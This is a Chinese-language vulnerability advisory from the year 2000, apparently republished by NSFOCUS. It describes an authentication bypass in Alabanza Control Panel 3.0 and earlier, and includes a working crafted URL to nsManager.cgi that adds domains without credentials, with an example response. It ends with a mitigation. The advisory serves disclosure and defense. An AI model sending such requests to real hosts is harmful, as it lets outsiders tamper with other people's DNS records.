首页 -> 安全研究

安全研究

安全漏洞
Alabanza控制面板中修改域的漏洞

发布日期:2000-09-26
更新日期:2000-09-26

受影响系统:

    Alabanza Control Panel 3.0 及以前的版本
描述:

任何一个远程用户都可以修改、删除和添加与Alabanza主机和分销商相关的域、MX和CNAME记录,
而无需经过有效的认证。通过请求一个特殊构造的URL,就可以在不需要用户名和密码的情况下使
用控制面板,而Alabanza的控制面板是用来管理控制与Alabanza相关的域的。


<* 来源:Weihan Leow (wleow@buffalo.edu) *>



测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!


在域名服务器中添加一个域(用example.com作为例子,目标是一个Alabanza主机或分销商的域):
http://target/cp/rac/nsManager.cgi?Domain=<example.com>&IP=<IP address>
&OP=add&Language=english&Submit=Confirm

请求下面的URL
http://www.example.com/cp/rac/nsManager.cgi?
Domain=HAHAHA.org&IP=127.0.0.1&OP=add&Language=english&Submit=Confirm

将会显示如下的页面:
"Name Server Manager
Domain example.com will be added within 1 hour!
Your domain example.com <IP address> will be setup within 1 hour!

Please click here to go back."
自此就可以修改、删除和添加域,也可以修改默认的MX或CNAME记录。



建议:

临时解决办法:

    NSFOCUS建议您在未得到厂商补丁之前先禁止使用Alabanza控制面板。

厂商补丁:

    暂无。

浏览次数:5804
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障